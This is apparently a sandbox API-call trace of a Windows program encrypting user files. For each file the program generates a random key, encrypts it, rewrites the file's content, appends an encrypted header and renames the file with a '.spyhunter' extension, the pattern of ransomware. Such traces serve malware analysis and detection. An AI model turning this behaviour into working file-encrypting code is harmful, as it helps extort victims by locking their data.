[0142.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.155] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.155] WriteFile (in: hFile=0x178, lpBuffer=0x57f0a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f064, lpOverlapped=0x0 | out: lpBuffer=0x57f0a4*, lpNumberOfBytesWritten=0x57f064*=0x4, lpOverlapped=0x0) returned 1 [0142.155] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f064, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f064*=0x30, lpOverlapped=0x0) returned 1 [0142.156] CloseHandle (hObject=0x178) returned 1 [0142.156] GetProcessHeap () returned 0x2c0000 [0142.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0142.156] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.spyhunter") returned 68 [0142.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.spyhunter")) returned 1 [0142.156] GetProcessHeap () returned 0x2c0000 [0142.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0142.156] GetProcessHeap () returned 0x2c0000 [0142.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.157] GetProcessHeap () returned 0x2c0000 [0142.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe8a8 | out: hHeap=0x2c0000) returned 1 [0142.157] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0a8 | out: pbBuffer=0x57f0a8) returned 1 [0142.157] GetProcessHeap () returned 0x2c0000 [0142.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.157] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f0a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f0a0*=0x30) returned 1 [0142.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.157] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0142.157] StrStrW (lpFirst="MSN Money.url", lpSrch=".txt") returned 0x0 [0142.157] GetProcessHeap () returned 0x2c0000 [0142.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.157] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f064, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f064*=0x85, lpOverlapped=0x0) returned 1 [0142.158] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.158] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57f064, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f064*=0x85, lpOverlapped=0x0) returned 1 [0142.158] GetProcessHeap () returned 0x2c0000 [0142.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.158] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.158] WriteFile (in: hFile=0x178, lpBuffer=0x57f0a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f064, lpOverlapped=0x0 | out: lpBuffer=0x57f0a4*, lpNumberOfBytesWritten=0x57f064*=0x4, lpOverlapped=0x0) returned 1 [0142.158] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f064, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f064*=0x30, lpOverlapped=0x0) returned 1 [0142.159] CloseHandle (hObject=0x178) returned 1 [0142.159] GetProcessHeap () returned 0x2c0000 [0142.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0142.159] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.spyhunter") returned 67 [0142.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.spyhunter")) returned 1 [0142.159] GetProcessHeap () returned 0x2c0000 [0142.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0142.159] GetProcessHeap () returned 0x2c0000 [0142.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.159] GetProcessHeap () returned 0x2c0000 [0142.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe7e8 | out: hHeap=0x2c0000) returned 1 [0142.159] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0a0 | out: pbBuffer=0x57f0a0) returned 1 [0142.159] GetProcessHeap () returned 0x2c0000 [0142.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.160] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f098*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f098*=0x30) returned 1 [0142.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.160] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0142.160] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".txt") returned 0x0 [0142.160] GetProcessHeap () returned 0x2c0000 [0142.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.161] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f05c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f05c*=0x85, lpOverlapped=0x0) returned 1 [0142.161] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.161] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57f05c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f05c*=0x85, lpOverlapped=0x0) returned 1 [0142.162] GetProcessHeap () returned 0x2c0000 [0142.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.162] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.162] WriteFile (in: hFile=0x178, lpBuffer=0x57f09c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f05c, lpOverlapped=0x0 | out: lpBuffer=0x57f09c*, lpNumberOfBytesWritten=0x57f05c*=0x4, lpOverlapped=0x0) returned 1 [0142.162] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f05c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f05c*=0x30, lpOverlapped=0x0) returned 1 [0142.163] CloseHandle (hObject=0x178) returned 1 [0142.163] GetProcessHeap () returned 0x2c0000 [0142.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0142.163] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.spyhunter") returned 75 [0142.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.spyhunter")) returned 1 [0142.164] GetProcessHeap () returned 0x2c0000 [0142.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0142.164] GetProcessHeap () returned 0x2c0000 [0142.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.164] GetProcessHeap () returned 0x2c0000 [0142.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7978 | out: hHeap=0x2c0000) returned 1 [0142.164] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0a0 | out: pbBuffer=0x57f0a0) returned 1 [0142.164] GetProcessHeap () returned 0x2c0000 [0142.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.164] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f098*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f098*=0x30) returned 1 [0142.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.165] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0142.165] StrStrW (lpFirst="MSN Autos.url", lpSrch=".txt") returned 0x0 [0142.165] GetProcessHeap () returned 0x2c0000 [0142.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.165] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f05c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f05c*=0x85, lpOverlapped=0x0) returned 1 [0142.166] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.166] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57f05c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f05c*=0x85, lpOverlapped=0x0) returned 1 [0142.166] GetProcessHeap () returned 0x2c0000 [0142.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.166] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.166] WriteFile (in: hFile=0x178, lpBuffer=0x57f09c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f05c, lpOverlapped=0x0 | out: lpBuffer=0x57f09c*, lpNumberOfBytesWritten=0x57f05c*=0x4, lpOverlapped=0x0) returned 1 [0142.166] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f05c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f05c*=0x30, lpOverlapped=0x0) returned 1 [0142.167] CloseHandle (hObject=0x178) returned 1 [0142.168] GetProcessHeap () returned 0x2c0000 [0142.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0142.169] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.spyhunter") returned 67 [0142.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.spyhunter")) returned 1 [0142.169] GetProcessHeap () returned 0x2c0000 [0142.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0142.169] GetProcessHeap () returned 0x2c0000 [0142.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.169] GetProcessHeap () returned 0x2c0000 [0142.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe728 | out: hHeap=0x2c0000) returned 1 [0142.171] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f098 | out: pbBuffer=0x57f098) returned 1 [0142.171] GetProcessHeap () returned 0x2c0000 [0142.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.171] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f090*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f090*=0x30) returned 1 [0142.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.171] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0142.171] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".txt") returned 0x0 [0142.171] GetProcessHeap () returned 0x2c0000 [0142.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.172] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f054, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f054*=0x86, lpOverlapped=0x0) returned 1 [0142.172] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.172] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x57f054, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f054*=0x86, lpOverlapped=0x0) returned 1 [0142.173] GetProcessHeap () returned 0x2c0000 [0142.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.173] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.173] WriteFile (in: hFile=0x178, lpBuffer=0x57f094*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f054, lpOverlapped=0x0 | out: lpBuffer=0x57f094*, lpNumberOfBytesWritten=0x57f054*=0x4, lpOverlapped=0x0) returned 1 [0142.173] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f054, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f054*=0x30, lpOverlapped=0x0) returned 1 [0142.173] CloseHandle (hObject=0x178) returned 1 [0142.173] GetProcessHeap () returned 0x2c0000 [0142.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0142.173] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.spyhunter") returned 79 [0142.173] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.spyhunter")) returned 1 [0142.174] GetProcessHeap () returned 0x2c0000 [0142.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0142.174] GetProcessHeap () returned 0x2c0000 [0142.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.174] GetProcessHeap () returned 0x2c0000 [0142.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefc70 | out: hHeap=0x2c0000) returned 1 [0142.174] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f090 | out: pbBuffer=0x57f090) returned 1 [0142.174] GetProcessHeap () returned 0x2c0000 [0142.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.174] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f088*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f088*=0x30) returned 1 [0142.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.174] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0142.174] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".txt") returned 0x0 [0142.174] GetProcessHeap () returned 0x2c0000 [0142.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.175] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f04c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f04c*=0x85, lpOverlapped=0x0) returned 1 [0142.175] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.190] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x57f04c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f04c*=0x85, lpOverlapped=0x0) returned 1 [0142.190] GetProcessHeap () returned 0x2c0000 [0142.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.190] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.190] WriteFile (in: hFile=0x178, lpBuffer=0x57f08c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f04c, lpOverlapped=0x0 | out: lpBuffer=0x57f08c*, lpNumberOfBytesWritten=0x57f04c*=0x4, lpOverlapped=0x0) returned 1 [0142.190] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f04c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f04c*=0x30, lpOverlapped=0x0) returned 1 [0142.190] CloseHandle (hObject=0x178) returned 1 [0142.223] GetProcessHeap () returned 0x2c0000 [0142.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0142.224] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.spyhunter") returned 81 [0142.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.spyhunter")) returned 1 [0142.225] GetProcessHeap () returned 0x2c0000 [0142.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0142.225] GetProcessHeap () returned 0x2c0000 [0142.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.225] GetProcessHeap () returned 0x2c0000 [0142.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefb98 | out: hHeap=0x2c0000) returned 1 [0142.226] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f090 | out: pbBuffer=0x57f090) returned 1 [0142.226] GetProcessHeap () returned 0x2c0000 [0142.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.226] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f088*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f088*=0x30) returned 1 [0142.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\.." (normalized: "c:\\users\\default\\favorites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.320] GetProcessHeap () returned 0x2c0000 [0142.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.321] GetProcessHeap () returned 0x2c0000 [0142.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321598 | out: hHeap=0x2c0000) returned 1 [0142.321] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f088 | out: pbBuffer=0x57f088) returned 1 [0142.321] GetProcessHeap () returned 0x2c0000 [0142.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.321] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f080*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f080*=0x30) returned 1 [0142.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.326] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0142.326] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch=".txt") returned 0x0 [0142.329] GetProcessHeap () returned 0x2c0000 [0142.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.330] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f044, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f044*=0x36c, lpOverlapped=0x0) returned 1 [0142.358] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffc94, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.358] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x57f044, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f044*=0x36c, lpOverlapped=0x0) returned 1 [0142.358] GetProcessHeap () returned 0x2c0000 [0142.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.358] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.358] WriteFile (in: hFile=0x120, lpBuffer=0x57f084*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f044, lpOverlapped=0x0 | out: lpBuffer=0x57f084*, lpNumberOfBytesWritten=0x57f044*=0x4, lpOverlapped=0x0) returned 1 [0142.358] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f044, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f044*=0x30, lpOverlapped=0x0) returned 1 [0142.358] CloseHandle (hObject=0x120) returned 1 [0142.358] GetProcessHeap () returned 0x2c0000 [0142.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.358] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.spyhunter") returned 61 [0142.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.spyhunter" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.spyhunter")) returned 1 